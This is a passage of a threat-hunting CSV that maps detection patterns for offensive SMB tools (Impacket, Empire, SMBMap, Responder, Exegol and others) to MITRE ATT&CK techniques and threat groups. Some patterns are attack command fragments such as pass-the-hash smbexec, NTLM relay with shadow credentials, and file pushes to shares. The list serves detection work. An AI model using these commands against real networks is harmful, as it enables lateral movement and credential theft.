Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59676" "*-smb2support --no-wcf-server --no-smb-server --no-http-server*",".{0,1000}\-smb2support\s\-\-no\-wcf\-server\s\-\-no\-smb\-server\s\-\-no\-http\-server.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","59677" "*-smb2support 
--remove-mic --shadow-credentials --shadow-target *",".{0,1000}\-smb2support\s\-\-remove\-mic\s\-\-shadow\-credentials\s\-\-shadow\-target\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59678" "*smbattack.py*",".{0,1000}smbattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - 
Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","59679" "*smbattack.py*",".{0,1000}smbattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59680" "*smbclient \\\\\\\\*\\\\TRANSFER -N -p * -c \*put *",".{0,1000}smbclient\s\\\\\\\\\\\\\\\\.{0,1000}\\\\\\\\TRANSFER\s\-N\s\-p\s.{0,1000}\s\-c\s\\.{0,1000}put\s.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","59681" "*smbclient -N -A 
*\\\\*\\*temp_out.txt*",".{0,1000}smbclient\s\-N\s\-A\s.{0,1000}\\\\\\\\.{0,1000}\\\\.{0,1000}temp_out\.txt.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","59682" "*smbclient.getFile('C$', 'Windows/CCM/SCNotification.exe.config*",".{0,1000}smbclient\.getFile\(\'C\$\',\s\'Windows\/CCM\/SCNotification\.exe\.config.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","59683" "*smbcrawler*",".{0,1000}smbcrawler.{0,1000}","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","N/A","2","161","21","2025-03-24T07:46:43Z","2021-06-09T19:27:08Z","59684" "*SMBCrunch-master*",".{0,1000}SMBCrunch\-master.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral 
Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","59685" "*SMBeagle.exe*",".{0,1000}SMBeagle\.exe.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","59686" "*SMBeagle.sln*",".{0,1000}SMBeagle\.sln.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","59687" "*smbeagle_*_linux_amd64.zip*",".{0,1000}smbeagle_.{0,1000}_linux_amd64\.zip.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","#linux","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","59688" "*smbeagle_*_linux_arm64.zip*",".{0,1000}smbeagle_.{0,1000}_linux_arm64\.zip.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","#linux","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","59689" "*smbeagle_*_win_x64.zip*",".{0,1000}smbeagle_.{0,1000}_win_x64\.zip.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","59690" "*smbenum.run*",".{0,1000}smbenum\.run.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","59691" "*SMBetray*",".{0,1000}SMBetray.{0,1000}","offensive_tool_keyword","SMBetray","PoC to demonstrate the ability of an attacker to intercept and modify insecure SMB connections. as well as compromise some secured SMB connections if credentials are known.","T1557 - T1562 - T1553 - T1213","TA0002 - TA0008 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/quickbreach/SMBetray","1","1","N/A","N/A","N/A","4","387","87","2018-08-17T00:45:05Z","2018-08-12T00:38:02Z","59692" "*-SMBExec*",".{0,1000}\-SMBExec.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-SMBExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59693" "*smbexec.py -hashes :*",".{0,1000}smbexec\.py\s\-hashes\s\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","APT20 - Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59694" "*smbexec.py 
-share*",".{0,1000}smbexec\.py\s\-share.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59695" "*smbexec.py*",".{0,1000}smbexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59696" "*SMBGhost.pcap*",".{0,1000}SMBGhost\.pcap.{0,1000}","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Discovery","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","7","678","194","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z","59697" "*smblogin.results.log*",".{0,1000}smblogin\.results\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 
- T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59698" "*smblogin.results.log*",".{0,1000}smblogin\.results\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59699" "*smblogin-spray.ps1*",".{0,1000}smblogin\-spray\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59700" "*smbmap -*",".{0,1000}smbmap\s\-.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","59701" "*smbmap -u guest -H *",".{0,1000}smbmap\s\-u\sguest\s\-H\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59702" "*smbmap.py *",".{0,1000}smbmap\.py\s.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","59703" "*smbmap.smbmap*",".{0,1000}smbmap\.smbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","59704" "*smbmapDump*",".{0,1000}smbmapDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","59705" "*smbmap-execute-command.txt*",".{0,1000}smbmap\-execute\-command\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","59706" 
"*smbmap-list-contents.txt*",".{0,1000}smbmap\-list\-contents\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","59707" "*smbmap-master*",".{0,1000}smbmap\-master.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","1","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","59708" "*smbmap-share-permissions.txt*",".{0,1000}smbmap\-share\-permissions\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","59709" "*SMBNTLMChallenge*",".{0,1000}SMBNTLMChallenge.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59710" "*SMBNTLMResponse*",".{0,1000}SMBNTLMResponse.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59711" "*smbpasswd.py -newpass *",".{0,1000}smbpasswd\.py\s\-newpass\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59712" "*smbpasswd.py*",".{0,1000}smbpasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket 
is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59713" "*SMBRelay.py*",".{0,1000}SMBRelay\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","59714" "*SMBRelayChallenge*",".{0,1000}SMBRelayChallenge.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
